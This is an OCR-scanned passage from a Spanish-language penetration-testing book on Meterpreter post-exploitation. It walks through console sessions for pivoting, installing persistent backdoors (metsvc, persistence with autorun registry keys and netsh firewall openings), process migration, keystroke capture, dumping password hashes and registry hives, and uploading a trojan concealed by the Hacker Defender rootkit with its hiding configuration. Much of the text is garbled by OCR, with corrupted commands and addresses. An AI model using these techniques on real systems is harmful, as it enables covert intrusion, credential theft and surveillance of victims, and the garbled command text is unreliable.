Generalmente, se puede describir un procedimiento para utilizar la técnica de pivoting mediante una 
'serie de pasos. Pero hay que tener en cuenta, que puede haber ocasiones en las que dependiendo de 

la experiencia y los conocimientos del auditor para realizar pequeñas variaciones, es posible que la 
"técnica mejore los resultados obtenidos. | 


La técnica de pivoting se puede enumerar en el siguiente procedimiento: 


- Conocimiento del entorno de la máquina vulnerada. Este primer paso se realiza en el nivel 
de enlace de la máquina vulnerada, para conocer el entorno que ésta dispone. 


- — Enrutamiento del tráfico de la máquina vulnerada a través de la máquina del atacante. 
- Realizar escaneos u otras acciones a través de la máquina vulnerada, gracias al 
enrutamiento anterior. 


- Рог último, si en las acciones anteriores se encuentran puertos abiertos se puede intentar 
realizar una explotación sobre alguno de estos servicios. 


7. Persistencia 


Una vez que se Пепе acceso a una máquina vulnerada puede resultar muy interesante conseguir que 
este acceso sea indefinido, en la medida de lo posible. Meterpreter dispone de varios métodos para 
conseguir crear una puerta trasera en el equipo vulnerado. 


Generalmente, con herramientas como Netcat se puede publicar una shell en un puerto determinado 
de la máquina víctima, e incluso hacer que este proceso se inicie automáticamente en cada arranque 
de la máquina. Este procedimiento es bastante sencilio, pero dispone de un problema y es la conexión 
directa. 


Como se ha podido estudiar con el caso de los payloads también se dispone de conexión inversa y 
directa, como en los troyanos. La conexión inversa proporcionará аі atacante о auditor la posibilidad 


- dejar un ejecutable que quede a la escucha en un puerto y asi el atacante será capaz de сопа 
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de que sea la máquina vulnerada la que se conecte a la máquina atacante cuando sea Posible, De 
este modo se evitan algunos sistemas de protección, сото por ејетріо un firewali. Aunque hay que 
pensar que si la máquina vulneraca bloquea las peticiones salientes, hecho muy poco común podría 
haber problemas con la conexión inversa. о 

а idea es 
Ат. dee | Ctarse еп 
cualquier momento para, ilicitaraente, manipular dicha máquina. El problema de lu conexión direcia 
es cuando la máquina víctima se encuentra detrás de un firewall, o incluso de un router, Por esta 
razón, la conexión directa es más común utilizarla en escenarios согрогацуоз dende la Máquina se 
encuentre, fisicamente o mediante el uso de VPN u otros métodos de conexión remota, en el т 
de ta red de la empresa. 


En el caso de la conexión directa es el atacante el que se conecta а la máquina vulnerada. L 


Чү ecja д e a t л -À ta uaj iiy РОТОРОТ das e Е 

Ба Е apartado se comentarán ios scripís mete y persistence, que son d08 Opciones que 

proporciona Meterpreter para asegurar, en la medida de lo posible, que se podrá volvera utilizar una 
» РА , . . . £ f 

sesión de Мегегргегег en la máquina vulnerada cuando el auditor lo necesite. 


PoC: Metsve y la conexión directa 

El script metsve crea un servicio en la máquina vulnerada, el cual se inicia al arrancar іа máquina 
y quedará a disposición del atacante en la máquina remota. Hay que tener en cuenta que mese 
funciona, en este ejemplo, con conexión directa. Es muy posible que sea necesario abrir yn puerto 
| 7 и de la máquina vulnerada para este servicio, el cual se queda а la escucha en еј puerto 


meterpreter > run metsvc 

[*] Creating a meterpreter service on port 31337 

[+] Creating a temporary installation directory C:AWINDOWSATEMPAeMiijqDQP... 
>> Uploading metsrv.dll... ` 
>> Uploading metsyc-Server, ехе... 


>> Uploading metsvc.exe... 
{+] Starting the service... 
+ Installing service теїѕус 
* Starting service 
Service metsvc successfully installed. 


Fig 4.55: Ejecución de meisvc. 


Para ejecutar mctsve se utiliza la instrucción run metsvc. Esta acción creará un servicio en la máquina 
vulnerada, el cual quedará а la escucha de peticiones. En las imágenes referentes а la máquina 
remota, se puede visualizar como existe un proceso denominado теѓѕус, y como el puerto 3 | 337 se 
encuentra abierto. 

жу КУ ө КЁ" IO d, 
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1317, 


Fig 4.56: Listado de conexiones en la máquina remota con metsve a la escucha en 313 


шаис, exe 
meteyc.exe одр 
ctfmon.exe 


00 6,54Ф4КВ 
ga py tst 572 KB ` 
00  2296KB 


YBoxTray.exe ‚ Administrador 00 2,544 КВ 

explorer.exe Administrador DO 13,396Kk 
| 5рооіѕу,ехе SYSTEM 00 4.380 KB 
| sechost.exe SYSTEM 00 3.268 KB 

svchost.exe SERVICIO LOCAL 00 6.666 KB 

sychost.exe Servicio de red 00 3.424 КВ 

svchost.exe . SYSTEM 00 21,100 КВ 
{ svchost.exe Servicio de red 3.988 КВ 
[isvchostexe SYSTEM _ ____ 


Fig 4,57: Listado de procesos remotos соп melsve presente, 


Lina vez que ¿Lin instalado el servicio en la máquina remota, se utilizará una shell sobre ta 
máquina vulnerada рага ejecutar la instrucción que abrirá el puerto en el firewall, para las conexiones 


entrantes. - 


Para abrir una línea de comandos en Meterpreter sobre el equipo renioto se ejecuta la instrucción 
shell. En la línea de comandos se debe ejecutar la instrucción netsh firewall add portopening TCP 
31337 metsye. De este modo e: firewall de Windows, dejará pasar estas peticiones y se podrá conectar 
con misye de manera remota, 


мены 


meterpreter > shell 
Process 1608 created. 
Channel 5 created, 
Microsoft Windows XP [Versión 5.1.2500] 
o Copyright 1985-2001 Microsoft Corp. 


netsh firewall add poriopening ТСР 31337 metsvc 
NIRO 
o Fig 4.58: Apertura del puerto 31337 en el firewall. 


| 
' шешн firewall add portopening TCP 31337 metsve 


ааттаа, 


hora hay que loba la conectividad, Sin cerrar la sesión de Meterpreter, se vuelve a la msfconsole 
por medio del comando hackground. Hay que utilizar el módulo explois/multilhandler que no sólo 
se utiliza para recibir conexiones, sino también para crearlas, es decir conexiones directas. Mediante 
cl uso de la instrucción use exploit/multi/handler en ms/console se carga el módulo. 


A | ыан ы ны Шы О ы E A ы ыбы ЫЫЫ. 
msí > use exploit/multi/handler 


nsf exbloitíhandler) > set PAYLOAD windows/metsyc_bind_tcp 
PAYLOAD => windows/metsvc_bind tcp 

msf exploit(handler) > set RHOST 182.168.0.68 

RHOST => 197,168.0.60 | 

msý  exploit(handterl > set LPORT 31337 

LPORT => 31337 

sf exploit(handler) > exploit 


[+] Starting the payload handler... 

[*] Started bind handler 

[+] Meterpreter session 2 opened (192.168.0.59:48278 -> 192.168.9.60:31337) at 2012-08-31 16:57:2 
7 +0200 


Fig 4.59: Configuración módulo exploitnultihanaler para conexión con metsre. 
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p- —- 
-i x * . e a ry 

| -U El agente intenta conectar cuando se inicia sesión, 

| -X Г agente intenta conectar cuando se inicia el sistema. 
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La configuración de dicho módulo es sencilla, se debe utilizar el payload windows/meisvc bind_tcp,. 
un payload especial de este recurso. Como se visualiza en la imagen anterior la configuración es 
reaimente básica, tal y como se han ido aprendiendo en este libro. { 


Es importante recalcar que hay que cambiar el puerto en la configuración, la variable LPORT debel 
tener un valor de 31337, que es el puerto por donde se realiza la conexión con теѓкус. Tras la correctag 
ejecución de dicha conexión, se obtiene una sesión de Meterpreter. Para comprobar totalmente que 
el servicio se encontrará levantado tras el reinicio de la máquina vulnerada, se recomienda al lecto 


que lo compruebe en su laboratorio. с 


El script metsve dispone de un parámetro para eliminar el servicio de la máquina vulnerada. La 
desinstalación de éste se provoca con la ejecución de run metsve —r. Hay que tener en cuenta que 
no se eliminarán los archivos creados en la instalación del servicio, esta acción deberá ser realizada! 
manualmente por el usuario o atacante, 


PoC: Persistence y la conexión inversa 

En esta prueba de concepto se utilizará el script persistence para conseguir que la máquina vulnerada 
sea la que se conecte al usuario atacante o auditor, Este es un ejemplo sencillo de conexión inversa 
para evitar que los sistemas de protección del usuario víctima eviten la conexión con su máquina, 
ul script persistence dispone de varios parámetros los cuales aportan potencia y flexibilidad a esta 
característica, А continuación se muestra una tabla con los parámetros y una breve descripción de 


- ellos. . 


q a me 


ЕНА a Шш Descripción 
Ь £ 4 р 


Automáticamente se configura mulri/handler para conectar con el agente. 


mes ae 


Automáticamente arranca el agente сото un servicio ai iniciar el sistema. 
ны ыа A ш 


| е __— ÁÉ—y__ — 2—22. ———————.__... 


¡ Especifica el payload que se va a utilizar, por defecto es windows/meterpreter/ | 
reverse _Icp. 


Especifica la plantilla del ejecutable para utilizar. 


ccrexión, 


Especifica el número de segundos que deben pasar entre cada intento de conexión 
| ; por parte del agente, 
| $ Especifica el puerto de la máquina del atacante donde se esperará a recibir la 


Especifica la dirección IP a la que se conectará el agente, es decir, la dirección 1P 
del atacante. 


Tabla 4.06: Parámetros del script persistence, 
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eterpreter > run persistence -U -X -i 60 -p 4444 -r 192,168,6.59 . 

{+} Running Persistance Seript 

[+] Resource file for cleanup created at /root/.msf4/Logs/persistance/PRUEBAS-81769CC_26120831.21| 

47/PRUEBAS-017600C_20120831.2147.r5c { 

[*] Creating Payload=windows/meterpreter/reverse_tcp LH0ST=192.168.9.59 LPORT=4444 | 
t 


[*] Persistent agent script is 614095 bytes long 

ї+ї Persistent Script written to C:WWINDOWSATEMPArOjS]jVrPFvDr,vbs 

{е} Executing script C:IWINDONSATEMPA rOjSjVrPFvDr.vbs 

¿35 Agent executed with PID 1488 

[+] Installing into autorun as HKLMScftwarelMicrosoftWindowsWCurrentVersionWiun20801ViCi 

77 Installed into autorun as HKLMSoftwareWMicrosoftYWindows'CurrentVersionWilun z0BviVici 
eterpreter > | 


Fig 4.60: Ejecución del script persistence. 


бп la imagen se puede visualizar como se lanza el script persistence con ía siguiente confi guración: 


El agente instalado en la máquina vulnerable intentará conectar cuando se inicie el sistema 
y cuando se inicie la sesión. 


Realizará intentos de conexión cada 60 segundos.. 


Intentará conectarse al puerto 4444 en la dirección IP 192,168.0,59 


¿Cómo se recibe la conexión por parte del agente? Se utilizará exploil/multi/handler tal y como se ha 
realizado en casos anteriores. La configuración del módulo es la habitual, es decir payload windows/ 
neterpreler/reverse_tcp о el que se haya configurado al agente con el parámetro —P, la dirección ІР 
de la máquina del atacante asignada а la variable LHOST y el puerto en la variable LEORT. 


A ST ИИНЕНИН 
isf > use exploit/multi/handler e 
asf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
AYLOAD => windows/meterpreter/reverse tcp 

sí exploit(handler) > set LHOST 192,168.8.59 

HOST => 192.168,9.59 

asf exploit(handler) > set £PORT 4444 

PORT => 4444 

uwsf exploit(handler) > exploit 


[*} Started reverse handler on 192.168.6.59:4444 
[+] Starting the payload handler... 


Fig 4.61: Configuración del módulo exploit/multi/handler para recibir conexiones de persistence: 


A £ + 4 | 

Ahora toca esperar a que la máquina vulnerada se encienda, en el caso de que se encontrase apagada, 
b de que transcurran los segundos de reintento de conexión facilitados en el parámetro —i en la 
ponfiguración del agente. 


exploit(handler) > exploit 


[+] Started reverse handler on 192.168.6.59:4444 
{*] Starting the payload handler... 
[+] Sending stage (752128 bytes) to 192.168,0.60 


(*] Meterpreter session 1 opened (192.168.0.59:4444 -> 192.108.0.00:1060) at 2012-08-31 17:32:00 
+90286 


meterpreter > 


Fig 4.62: Conexión recibida por multi/handler del agente de persistence. 
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8. Migración a un proceso 


Cuando se realiza la fase de explotación y se consigue introducir un payload en la memoria de la 
máquina victima, se produce la vulneración de un proceso. En otras palabras, чӣ payload, сото 
por ejemplo Meterpreter se inyecta en un proceso de la máquina haciéndose pasar por uno de'ellos, 
сото por ejemplo el típico nolepad.exe o svchost.exe. 

EI seripí post/windowsímanage/migrate o'el comando migrate permite migrar de ин proceso а ого 
la sesión de Meterpreier. ¿Con qué objetivo? Es sencillo, cuando un atacante obtiene una sesión de 
Melterpreler éste se inyecta en el proceso vulnerado. Si la víctima cerrase dicho procrao la sesión de 
Meterpreter se cerraría. Por ejemplo, mediante un ataque al navegador web de un usuario se obtiene 
una sesión de Meterpreter, si el usuario cerrase el proceso del navegador, porque cierra la aplicación |` 
por ejemplo, el atacante se quedaría sin la conexión. 


Muchos de los exploits disponen de la automigración, con la que nada más conseguir el acceso a la 
máquina vulnerada se migran a otro proceso. Esto se especifica con posibilidad de AutoRunSeript, 
donde se especifica la orden que se debe ejecutar al conseguir la explotación. ¿Dónde se localiza 
AutoRunScripf? Cuando se encuentre el módulo del exploit cargado se puede utilizar el comando 
show advanced para listar las opciones avanzadas del módulo, Entre dichas opciones se encuentra 
AutoRunScript. 


mef 
rc 
AutoRunScript => multi_console_command -rc /root/pruebaAutoRun. гс 
msf ехр101ї (0508 067 пеїарі) > exploit 


р ыыр 1 
exploit(ms08_067_netapi) > set AutoRunScript multi console command -re /rovt/pruebañutoRun. 


[+] Automatically detecting the target... 

[+] Fingerprint: Windows XP - Service Pack 3 - lang:Spanish 

[*] selected Target: Windows ХР SP3 Spanish (NX) 

[+] Attempting to trigger the vulnerability... 

[*] Sending stage (752128 bytes) to 192.168.1.35 

[*] Reterpreter session 5 opened (192.168.1.40:4444 -> 192.168,1.35:1424) at 2012-08-31 17:57:13 
+0208 


[*] Started reverse handler on 192.168.1.40:4444 | | 


meterpreter > o { 
[+] Session ID 5 (192.168.1.40:4444 -> 192.168.1.35:1424) processing AutoRunScript 'multi_consol 
e command -re /root/pruebaAutoRun.rc* | 

{*} Running Command List .. 

(*] Running command run checkvm 

[+] Checking if target is a Virtual Machine ..... 

[*] This 15 a Sun VirtualBox Virtual Machine 

[+] Running command run post/windows/manage/migrate 

[+3 Running module against PRUEBAS-01768CC 

[*] Current server process: svchost.exe (1112) 

{*] Spawning notepad.exe process to migrate to 

l+] Migrating te 1100 

j+] Successfully migrated to process 1100 


imeterpreter > o o М 
а кз = ЕР ; Ко Йй К ., Tranque. 
Fig 4.63: Configuración y ejecución de AutoRunScript con migración en el arrai 1 
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Una opción muy interesante para AutoRunScript es la posibilidad de preparar un archivo RC, de 
automatización y ejecutar la instrucción set AutoRunScript multi_console_commend -re <ruta 
fichero RC>. En el interior de dicho archivo RC deberían encontrarse todas las órdenes que se 
quieren ejecutar, por ejemplo run migrate, run checkvm, etcétera. Siendo una instrucción cada línea 
del fichero RC, 


Migrare proporciona migración а oíros procesos en cualquier momento. Se puede ejecutar sin 
parámetros por lo que migrará a un proceso con nombre notepad por ejemplo, con un parámetro 
indicando el PID а! que se quiere migrar. Puede ocurrir que al ejecutar тірке se obtenga una 
denegación en la migración. Esto sucede debido a que no se tienen privilegios sobre el proceso аі 
que se quiere migrar, para solucionar esto se debería realizar una escalada de privilegios como se ha 
estudiado en este capítulo. 


PoC: De proceso a proceso capturando pulsaciones 

En esta prueba de concepto se realizarán pruebas que demuestren lo sencillo que puede ser ir 
migrando de proceso en proceso, siempre y cuando los permisos lo permitan. En primer lugar se 
verá como un usuario sin privilegios sobre un proceso de sistema no puede migrar la sesión a dicho 
proceso. | 


Insterpreter > getuid - ] 
“ver username: PRUEBAS-01750CCAdministrador 
meterpreter > migrate 1400 

t+] Migrating to 1400... 

l-} core_migrate: Operation failed: Access is denied, 
¡neterpreter > getsystem 

...901 system (via technique 1). 


meterpreter > migrate 1400 | 


[+] Migrating to 1400... 


[+] Migration completed successfully. 


Fig 4.64: Intento de migración erróneo y posteriormente satisfactorio. 


En la imagen se puede visualizar como al principio el auditor tenía como identidad el usuario 
“Administrador”. Al intentar realizar una migración a un proceso perteneciente a System, se produce 
el error. Para elevar privilegios, en una máquina Windows XP SP3, se utiliza el comando gelsystem, 
Al conseguir los privilegios necesarios, se puede llevar a cabo la migración а! proceso 1400, que era 
el primer objetivo, 


Además, se puede imaginar el escenario en el que se quieran capturar las pulsaciones o entradas de 
los procesos, por ejemplo un notepad. Ea funcionalidad de keyscan, ya comentada anteriormente en 
este capítulo, ayuda a recoger la información que, por ejemplo la víctima teclea en su máquina. Otro 
ejemplo válido sería la captura de pulsaciones del navegador web de la víctima, 


Para capturar las entradas o pulsaciones de un proceso concreto se utiliza el comando keyscan_siart, 
Ántes de parar el keyscan se debe volcar el contenido mediante el uso del comando keyscan_dump. 
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meterpreter > migrate 940 
1%] Migrating to 948... 
[*] Migration completed successfully. 
.|neterpreter > keyscan_ 

keyscan dump  keyscan_start Кеуѕсап stop 
meterpreter > keyscan_start 

Starting the keystroke sniffer... 


Fig 4.65: Migración a un proceso y arranque del keyscan, 


EREE ШЫН E ASIA OO 
[тетеги тег > keyscan_dump i 


Dumping captured keystrokes... 

<Return> <Return> hola metasploit, se que me estas espiendo,.. <Return> 
Imeterpreter > keyscan_dump 
Dumping captured keystrokes... 


Fig 4.66: Volcado de pulsaciones de (ес!айо con keyscan_dump. 


9, Seraper 


Scraper es un script que permite realizar una recogida de información con partes sensibles de la 
estructura de un sistema operativo Windows, Scraper se encarga de recolectar información básica 
del equipo como son los usuarios, la información que proporciona el comando systeminfo, enumerar 
los recursos compartidos de la máquina, volcado de usuarios y hashes de la misma, conexiones 
activas y estadísticas de éstas, variabies de entorno, grupos, servicios del sistema, etcétera, Todas 
estas funcionalidades realmente ya se habían estudiado en este capítulo. 


Lo que realmente Ulerencia a seraper de otros scripts es la recogida y descarga de partes o árboles 
del registro. Рог etemplo, scraper realiza una exportación en la máquina vulnerada de HKCU (el 
árbol del registro de Current User), para después descargarlo automáticamente a la máquina del 
atacante, Realiza el mismo proceso para HKLM, HKCC, HKCR у НКО. Estos ficheros de extensión 
REG que se descargan pueden ser analizados a posteriori en la máquina del auditor con tranquilidad. 


feeterprater > run ѕегарег Ы Exporting ГКС 

[+] New session оп 192 168.8.62:448... iit) Downloading НКСС (C:XWINDOWSATENPAVYTZeLhk, reg). 
[+] Gathering basic system information... А Ге} Cleaning НКСС 
{[+] Cumping password hashes... ju Exporting HKCR 

[+] Obtaining the entire registry... 161 Downloading НКСА (C:\WINDOWS\TEMPNQUnTWARA. reg) 
{+} Exporting HKCU ¡l*] Cleaning АКСА 

[+] Downloading HKCU (C:NWENDOWSTERPqoxEiqFX, reg) [Ге] Exporting HKU б 
(+) Cleaning HKCU [+] Downloading HKU (C:AWINDOWSATEMPASpBcQFYe. reg) 


lx] Exporting HKLM i+} Cleaning HKU 
[*] Dowrloading HKLM {C:\WINDOWS\TEMP\dbWPKLLR, reg) 116) Completed processing оп 192,168.0.62:445... 
11+) Cleaning НКМ :meterpreter > 


Fig 4.67: Ejecución del script scraper рага la recogida de información. 


ИТА 


¿Dónde se almacenan los archivos que automáticamente genera scraper? La rula por defecto. es 
S¿HOME/msf4Hogs/scripts/scraper/<dirección IP>. En esta ruta se pueden visualizar una serle de 
archivos con nombres identificativos de la información recogida por scraper. : 
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10. Actualizando de cmd a Meterpreter 


En este apartado se comentarán las posibilidades para actualizar de una cmd a una sesió de 
Meterpreier. Este hecho puede ser útil cuando al ejecutar un exploit sólo se quiera pre ни ш 
aplicación oel sistema operativo son vulnerables y que ésta suposición se realiza con А Tambi | 
puede ocurrir que las necesidades cambien por lo que se necesite un payload! más potente. No hace 


falta realizar la p ació p 
: ех 19; , сеа conocer las ostbilic апе de comanda 
SESSIONS de msiconsole. і | | | Ми | | 


- Sp ne de varos а га Fi y 1 ; i "Ay rel É ibili i 
| { СА oa ualqu ¡Cra а ип Mete рі еге r es el parámetro u. Tras ejecutar dicha acció Н se 


procede a la subida del stager a vez finali i 
ager, y una vez finalizada la subida, se procede a la eiecució enció 
de un Mererpreter, а, Se j le a la ejecución y obtención 


.62:1576) at 2012-88-31 19:36:31 +9200 


= exploit(ms08_067_netapi) > sessions 


nsf exploit(ms08_067_netapi) > [+] Neterpreter session 9 opened (192.168.0.63:4444 -> 192.168 | 


Connection 


Pm +42 


Id Туре Information | 
| 


7 shell windows Micros і i 
Я Oft Windows ХР [Versi п 5.1.2690] (С і -2091 Мі 
к уе 142. 168.8.83:4444 -> 192,168.0.62:1561 (ыл р ds ыл, = 
meterpreter Xx86/win32 NT AUTHORITYASYSTEM @ PRUEBAS -81768TC 
192.168.9.63:4444 -> 192.168.9.62:1576 (192.168.8.62) 


Fi “Абилтаев К І 
ig 4.68: Actualización de un payload shell a Meterpreter mediante el comando sessions. 


11. Railgun 


Uno d А М Е -e 
e los aspectos más complejos de este libro es la extensión Railgun. Esta extensión proporciona 


Р; . 
al atacante con una sesión ; ibili | 
de Meterpreter la posibilidad de interact irer 
ai | uar directament > 
Jos sistemas Windows. а 


Bsta interacción se realiza a través del comando irb de Meterpreter, el cual permite acceder a una 
ү Еп esta consola se puede escribir código directamente para la interacción con la API de 
Windows, pudiendo cargar DLLs en la máquina comprometida y ejecutar su código después. E 
tamente recomendable visitar la URL http://msdn.microsofl.comien-us/library/aa383 P E 
jonocer en profundidad las funciones que se encuentran en las DL Ls que pueden utilizar = 


к е Stager progress - 98.15% done (100216/102105 bytes) 

е] sendin 5їадег progress - 99,78% done (181888/192108 bytes) 

* ending stage (752128 bytes) to 192.168.9,62 
Conmand Stager progress - 100.98% done (192198/102108 bytes) 
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¿Qué se puede hacer con Railgun? La respuesta es todo, ya que con Railgun se pueden invocar todas 
las funciones de la API de Windows, lo cual proporciona un potencial y flexibilidad muy interesante. 
Con Railgun se puede acceder directamente a los dispositivos que se encuentran disponibles en 
la máquina vulnerada, acceder a la memoria, mapear dispositivos, leer y escribir de disco, y un 
sinfín de posibilidades. Al principio el usuario puede ser reacio a la sintaxis de Railgun, pero es 
recomendable aprenderlo ya que la potencia que proporciona es inigualable, 
leterpreter > irb аш Е 


[*] Starting ТАВ shell’ 
[+1 The *client' variable holds the meterpreter client 


A y 


>> rg = client.railgun 


Fig 4.69: Ejecución de railgun en Melerpreter 


А continuación se exponen algunos códigos de ejemplos para que se pueda conocer la interacción 
con la API de Windows y la potencia que Railgun ofrece, 
t Сагда Railgun y ejecuta una orden 


rg = client.railgun 
1g.shell32.IsiiserAnAdmin 


эң t . , . l ` A ` РА a 

En este código se realiza la carga de Railgun, obteniendo una instancia. Además, se ejecuta una 
orden a través de la DLL shel(32. La función ejecutada es la pregunta /sUserAndamin, de la cual se 
obtendrá la respuesta booleana, por ejemplo { “GetLastError ”=>0, “return”=> true). 

rg .kernel32.GetCurrentProcessId 

=> (“GetLastErroc”“=>0, *"return”“=>1108) 

rg.kernel32.GetComputerNameaA (250,250) | 

=> ¡(“GetLastError*=>203, “return“=>true, “lpBuffer”=>"PRUEBAS- 01760CC", “п581- 
ze”=>15) 

rg .user32.LoukWorkStation 

=> [(“GetLastError”=>0, “return“=>0) 


Enel código anterior se utilizan distintas funciones como GelCurrentProcessido GetComputer Named, 
de la DLL kernel32, Por otro lado, se ejecuta la función LockWorkStation con lo que se puede 
bloquear la máquina vulnerada, disponible en la DLL user32. 


>> Fg.shell32.1IsUserAnAdmin 

=> ("GetLastError*=>8, “return"=>true) 

>> rg.kernel32.GetCurrentProcessId 
(["GetLastError"=>9, "return"=>1108) 


rg.kernel32.GetComputerNameA(250,250) 
("GetLastError"=>283, *return*=>true, “lpBuffer”=>"PRUEBAS-91768CC", "nsize"=>15) 


rg.user32.LockWorkStation 
{"бей аѕТЕггог"=>0, "return*“=>true) 


Fig 4.70: Ejecución de funciones de la API de Windows en máquina vulnerada. 


132.MessageBoxA 


aen la; 


Como último ejemplo curioso se propone ejecutar la siguiente instrucción 2.056 о. 
зг nn ? ” rn з ә *f г b ga; ет 15! 
(0, “hola”, ” mundo”, ”MB_OK”). Esta instrucción hará que se muestre un pop га GG ais 
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máquina vulnerada indicando el mensaje configurado. ¿Se podría lanzar una ventana que simule una 
recogida de credenciales? De nuevo, el límite está en la imaginación del usuario. 


12. Otras PoC interesantes 


En este apartado se explican y detallan otras pruebas de concepto que deben ser estudiadas 
hata entenderse correctamente. А lo largo del capitulo se han ido estudiando el gran número de 
posibilidades que ofrece Meterpreter, y lo importante que es un payload para realizar una correcta 
[азе de post-explotación. A continuación se explicarán interesantes pruebas de concepto que 
completan un interesante capítulo sobre el mejor payload disponible en Metasploií según la mayoría 
de los usuarios. 


PoC: Meterpreter, troyanos y rootkits educativos 

En esta prueba de concepto se presenta la posibilidad de subir un troyano a la máquina vulnerada y 
ocultarlo mediante el uso de un rootkit. Para el desarrollo de esta prueba de concepto se ha utilizado, 
tanto un troyano como un rootkit educativo. La idea de estos dos tipos de malware no es realizar 
acciones malignas sobre las víctimas, y sí explicar el funcionamiento de este ti ро de aplicaciones, El 
iso Пе ambos es realmente sencillo como se puede ver en la prueba de concepto, 


El rooíkit utilizado es Hacker Defender, también conocido como hxdef, satentras que el troyano 


utilizado es Flu, el cual puede ser descargado de la URL http://www flu-project.com/downloadflu/ 


Ju. El punto de partida de la prueba de concepto es una sesión de Meterpreter obtenida mediante la 


explotación de una vulnerabilidad en la fase previa a la de post-explotación, 


Para subir cl ejecutable del troyano, como del rootkit, desde la sesión de Meterpreter se utiliza el 
comando upload. El troyano está compuesto del ejecutable, mientras que el коой! depende de 
su fichero INI de configuración, que también debe ser subido junto a su ejecutable, En la imagen 
se puede visualizar la subida del troyano y de los ficheros del rootkit, además de la ejecución del 
ejecutable del troyano. 


meterpreter > upload /root/flu.exe cMwindowsYlsystem32 | 
[+] uploading : /root/flu.exe -> c: \Wwindowsysystem32 ; 

[*] uploaded : /root/flu,exe -> c: \windows\system32\ flu. exe 

мегегргеїсг > upload /root/hxdef/hxdef108.exe c: \\Wwindows\\system32\ y 

[*] uploading ; /root/hxdef/hxdef100.exe -> ci\windowsisystem32\ 

[+] uploaded : /root/hxdef/hxdef100.exe -> c: \windows\system32\\hxdef100.exe 
meterpreter > upload /root/hxdef/hxdef100.ini c: \\windows\\system32y\ 

[*] uploading : /root/hxdef/hxdef100.ini -> t: \windows\system32\ | 
[*3 uploaded : /root/hxdef/hxdef199.ini -> c:WwindowsAsystem321Whxdef190.ini į 
meterpreter > execute -f с:\\міпаоме\\ѕуѕіемз2\\ flu. exe ` 

Process 1994 created. 

meterpreter > 


Fig 4.71: Subida de malware a la máquina vulnerada y ejecución de lrayano. 
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Tras la ejecución del troyano en la máquina vulnerada, se puede visualizar еп el adiinistrador де, 
tareas de la misma сото el proceso aparece en el listado de estos que proporciona el sistema, L? 
detección del troyano podría ser fácil para el ojo humano, en este caso, 


ЫЕ Рат ШЕЕ ШЕ DAA е ET у: 
1,224 KB 


3,250 KB 


dfsavc.exe ' | 1.836 KE 


dns, exe 82,104KB 
dm. exe Administ... 1,015 KB 
Administ... 19.028 KB 
Administ... 9,680 КВ 


Fig 4.72: Listado de procesos en la máquina vulnerada tras la ejecución del troyano. 


Para ello se ejecuta el rootkit, pero antes se debe configurar su fichero INI. Este fichero del 
configuración dispone de varios apartados o secciones en los que, por ejemplo se especifican los 
procesos que deben ser ocultados por el rootkit. Se permite el uso de metacaracteres, рог ejemplo, К 
se quiere ocultar todo procesa que empiece por flu, se puede indicar en el apartado hidden table del 
fichero la palabra //a*. En la imagen se muestra un ejemplo de parte del fichero de configuración, 
del rootkit. ' 


ONENA 22.2. 


[Hidden Table] 
hxdef* 
rcmd, ехе 


flut 


Е 


[Root Processes! 
hxdef* 
rcmd.exe 


[Hidden Services] 
HackerDefender+ 


| [Hidden RegKeys] 
ttackerdefender190 

LEGACY _HACKERDEFENDER106 
¡HackerDefenderDrv109 
LEGACY_HACKERDEFENDERDRV100 


[Hidden RegValues] 


[startup Run] 
Fig 4.73: Configuración de Hacker Defender: 


od AN 
AESA 
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La máquina vulnerada ha quedado infectada por el troyano y además, el rovíkii, oculta las acciones - PoC: Ехріоѓадо e infectado 
maliciosas que éste realiza y su presencia. El rootkit lógicamente, también puede ocultarse а sí 


; | i Esta breve prueba de concepto ayuda a entender la imporlancia que tienen las opciones avanzadas 
mismo, para dificultar su presencia y acciones. 


de los módulos de exploits en el instante de realizar la explotación. El escenario es sencillo, se y 
proceder а la explotación de un sistema operativo, del cual no se conoce si el usuario puede apagar 
el equipo en cualquier momento, si es posible que se caiga la conexión, o si, puede que sin más se 
necesite realizar la explotación, infectar dicho equipo y finalizar la sesión. Todas estas acciones cabe 
la posibilidad de que sucedan en un rango de tiempo de pocos o muy pocos segundos, 


з аа 
А continuación se muestra el panel del troyano, donde se pueden visualizar las máquinas infectadas 
y el estado de éstas. 


En primer lugar se procederá а la automatización de un scripí RC para que cuando se realice la 
explotación se ejecute dicho cript. El script contiene órdenes para infectar con un agente y de este 
modo conseguir la persistencia inmediatamente, Además, la última orden es exit para finalizar la 
” аган" о sesión de Meterpreler. 

Жура к МАСТ ш conection: кота Otra posibilidad es utilizar el comando update para subir el ejecutable de un troyano y ejecutarlo 

E mediante execute, todo esto desde un fichero de automatización. Se podría añadir un гоо para 
ocultar dicho troyano. Otra opción interesante, es la posibilidad de utilizar órdenes para derribar 
sistemas de protección que pudiera haber en la máquina vulnerada antes de proceder a la subida de 
este tipo de malware. Todas estas instrucciones se podrían escribir en un script y automatizar dicho 


Fig 4.74: Panel de administración del troyano para manipular la máquina vulnerada, 


En este punto el atacante tiene el control de la máquina vulnerada permanentemente. Este troyano proceso. 

puede realizar un gran número de acciones sobre la máquina vulnerada, por ejemplo, capturas E 

de pantalla, captura de las pulsaciones de teclado remoto, utilización de las líneas de comandos Ка шы DGZ лаары] > SEL AutORUNSCHIEN. MULTE CONSOLE Command. те ав шо 
disponibles en la máquina infectada, por ejemplo un cmd o una PowerShell. En la imagen se AutoRunScript => multi console command -rc /root/inicialInfeccion. гс 

puede visualizar como se recupera el contenido de un fichero denominado secret.txt de la maquina msf exploit(ms03_067_netapi) > exploit 


vulnerada. (ер Started reverse handler on 192.168.1.48:4444 
. 112] Automatically detecting the target.. 


ha 


! ge , : {*] Fingerprint: Windows XP - Service Pack 3 - lang: Spanish ч 
powershell cat secretitxt 2 lf] Selected Target: Windows ХР SP3 Spanish (NX) 
| 5 tr ғ {*] Attempting to trigger the vulnerability... . 
¡[*] Sending stage (752128 bytes) to 192.168.1.35 
с С [+] Meterpreter session 20 opened (192.168.1.40:4444 -> 192.168.1.35:1837) at 2012-08-31 21:45;1 
“user: Tube - у О É а +0280 
| 


і 
раз) y solo digo que,” 


ES meterpre 
úse pablo AS ү [*] Session 10 20 (192.168.1.40:4444 -> 192.168.1.35:1037) processing AutoRunScript 'multi conso 
pass: 104 bit | | К з. le command -rc /root/inicialInfeccion.rc' 
Шат e É [+] Running Command List ... 
pass: папса quise hacerte da?o . E е А К. command run persistence -U -X -P windows/shell/reverse_tcp -i 60 -p 4444 -r 197, 
user: Au | E E [+] Running Persistance Script 
